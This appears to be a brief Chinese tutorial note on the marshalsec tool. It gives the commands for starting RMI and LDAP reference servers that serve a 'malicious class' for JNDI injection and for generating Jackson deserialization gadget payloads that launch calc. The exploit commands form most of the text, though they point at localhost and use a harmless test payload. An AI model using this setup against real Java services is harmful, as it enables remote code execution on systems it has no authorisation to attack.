开启rmi服务,恶意类放到服务上

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1/css/#ExportObject 1099

开启ldap服务

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/css/#ExportObject 1389

参考链接
列出所有jackson的gadgets传参为calc

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a exploit.exec="calc"

# marshalsec使用
所有支持的组件
# marshalsec使用
所有支持的gadgets
# marshalsec使用
# marshalsec使用
如果想查找组件可以生成的gadgets有哪些
以Jackson为例

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson

# marshalsec使用
如果想查找gadgets可以用于哪些组件生成
1、以resin为例,可以查看手册
# marshalsec使用
2、选择想看的gadgets->find usages
# marshalsec使用
参考链接

相关文章:

  • 2021-08-29
  • 2022-01-26
  • 2022-12-23
  • 2021-05-27
  • 2021-04-06
  • 2021-07-06
  • 2021-07-10
猜你喜欢
  • 2021-08-26
  • 2021-11-17
  • 2021-08-27
  • 2021-10-03
  • 2021-07-03
  • 2021-08-23
相关资源
相似解决方案